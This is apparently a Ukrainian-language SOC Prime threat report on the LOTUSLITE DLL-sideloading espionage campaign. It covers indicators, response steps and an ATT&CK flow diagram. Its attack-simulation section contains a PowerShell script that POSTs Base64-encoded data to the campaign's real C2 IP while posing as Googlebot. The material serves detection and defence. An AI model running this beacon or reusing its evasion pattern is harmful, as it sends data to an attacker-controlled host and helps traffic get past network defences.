SOC Prime Bias: Критичний

16 Січ 2026 16:42

Кампанія LOTUSLITE: Цільовий шпіонаж, керований геополітичними наративами

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Стежити
Кампанія LOTUSLITE: Цільовий шпіонаж, керований геополітичними наративами
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Acronis TRU спостерігало цільову шпигунську операцію, спрямовану на організації уряду США, яка доставила зловмисний DLL бекдор, LOTUSLITE, всередині ZIP-архіву на політичну тематику. Допоміжний завантажувач виконує підключення DLL, після чого бекдор передає сигнали на заздалегідь зумовлену C2 точку через HTTPS, імітуючи користувача Googlebot. Оператори встановлюють стійкість, створюючи окремий каталог ProgramData і додаючи запис Run у реєстрі. На основі технік, які використовувалися, діяльність була пов’язана з Mustang Panda.

Розслідування

Аналітики розпакували ZIP і ідентифікували бінарий завантажувач (Maduro to be taken to New York.exe) разом зі зловмисним DLL (kugou.dll). Аналіз задокументував потік sideloading DLL, поведінку бекдор, використання мутексів та точні артефакти стійкості, створені на хості. Перегляд інфраструктури приписав комунікації до єдиного IP (172.81.60.97) та домену, розміщеного на spryt.net, нібито розміщеного в Фініксі, Арізона. Приписання до Mustang Panda було оцінено з помірною впевненістю через спільні тактики та шаблони інфраструктури.

Зменшення ризиків

Виявлення Acronis спиралися на хеші SHA-256 для зловмисних бінарний і висвітлили специфічну папку стійкості ProgramData та місце запису ключа Run. Мережеві контролі повинні позначати вихідні HTTPS-з’єднання з визначеним IP/доменом, коли вони поєднуються з рядком користувача Googlebot. Зменшіть стійкість шляхом запобігання виконанню невідомих бінарний з ProgramData і видалення відповідного запису Run з реєстру при виявленні.

Реакція

Негайно ізолюйте постраждалі кінцеві точки, зберіть вольативні дані та збережіть зловмисний бінар для аналізу. Видаліть створену папку ProgramData та видаліть відповідне значення запису Run, щоб порушити стійкість. Заблокуйте з’єднання з C2 IP та доменом, і оновіть виявлення кінцевих точок з наданими хешами файлів та індикатором мутекса. Нарешті, проведіть пошук по всьому середовищу для додаткових хостів, які демонструють ті ж підписи завантажувача та DLL.

graph TB %% Визначення класів classDef technique fill:#ffcc99 classDef malware fill:#ff9999 classDef tool fill:#cccccc classDef process fill:#c2f0c2 classDef action fill:#99ccff %% Вузли з описом технік initial_access[“<b>Техніка</b> – <b>T1566.001 Цільовий фішинг з вкладенням</b><br/>Доставка шкідливого ZIP-архіву, що містить завантажувач та шкідливу DLL.”] class initial_access technique execution[“<b>Техніка</b> – <b>T1574.001 Перехоплення потоку виконання: DLL</b><br/>Завантажувач підвантажує <i>kugou.dll</i> як бекдор.”] class execution technique defense_evasion1[“<b>Техніка</b> – <b>T1036 Маскування</b><br/>Перейменування завантажувача на \”Maduro to be taken to New York.exe\” та DLL на \”kugou.dll\” для імітації легітимних файлів музичних сервісів.”] class defense_evasion1 technique defense_evasion2[“<b>Техніка</b> – <b>T1036.003 Перейменування легітимних утиліт</b><br/>Використання назв відомих утиліт Tencent Music для приховування шкідливих компонентів.”] class defense_evasion2 technique discovery[“<b>Техніка</b> – <b>T1033 Виявлення користувача/власника системи</b><br/>Виклики GetComputerName та GetUserName для збору інформації про хост і користувача.”] class discovery technique command_exec[“<b>Техніка</b> – <b>T1059.003 Командний інтерпретатор Windows</b><br/>Запуск інтерактивної оболонки <i>cmd.exe</i> через анонімні канали.”] class command_exec technique persistence[“<b>Техніка</b> – <b>T1037.001 Скрипти ініціалізації входу</b><br/>Створення <i>C:\\ProgramData\\Technology360NB</i>, копіювання exe як <i>DataTechnology.exe</i>, додавання ключа Run <i>Lite360</i> в HKCU.”] class persistence technique c2[“<b>Техніка</b> – <b>T1102 Веб-сервіс</b> / <b>T1102.002 Двосторонній зв’язок</b> / <b>T1071.001 Веб-протоколи</b><br/>Використання WinHTTP для POST-запитів до https://172.81.60.97:443 з User-Agent Googlebot, реферером Google та заголовком 0x8899AABB.”] class c2 technique %% Потік атаки initial_access –>|призводить до| execution execution –>|дозволяє| defense_evasion1 defense_evasion1 –>|підтримує| defense_evasion2 defense_evasion2 –>|забезпечує| discovery discovery –>|дозволяє| command_exec command_exec –>|сприяє| persistence persistence –>|встановлює| c2

Потік атаки

Виконання моделювання

Попередня умова: Перевірка телеметрії та базової лінії повинна бути пройдена.

Мотивування: У цьому розділі детально описується точне виконання техніки противника (TTP), призначеної для запуску правила виявлення. Команди та розповідь МАЮТЬ прямо відображати виявлені TTP і повинні генерувати точну телеметрію, очікувану логікою виявлення.

  • Розповідь про атаку та команди:
    Атакувальник захопив робочу станцію та встановив бекдор LOTUSLITE. Щоб захопити дані, зливаючись із легітимним веб‑трафіком, бекдор видає HTTP POST на заздалегідь зумовлений C2 сервер 172.81.60.97. Він чітко встановлює Заголовок User‑Agent до “Googlebot”, щоб маскуватися під павука пошукової системи, сподіваючись прослизнути повз захисту периметра, який допускає таких агентів. Навантаження містить дані, закодовані в Base64.

  • Скрипт регресійного тестування:

    # Імітація C2 LOTUSLITE – powershell
    $c2 = "http://172.81.60.97/receive"
    $ua = "Googlebot"
    $data = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("sensitive data payload"))
    $body = @{ "data" = $data }
    
    try {
        Invoke-WebRequest -Uri $c2 -Method POST -Headers @{ "User-Agent" = $ua } -Body ($body | ConvertTo-Json -Compress) -UseBasicParsing
        Write-Host "C2 запит успішно надіслано."
    } catch {
        Write-Error "C2 запит не вдався: $_"
    }
  • Команди очищення:

    # Видаліть будь-які тимчасові файли або залишкові мережеві з'єднання
    Remove-Item -Path "$env:TEMPlotuslite_temp*" -ErrorAction SilentlyContinue
    # (Жодних постійних сервісів не було створено під час цієї симуляції)
    Write-Host "Очищення завершено."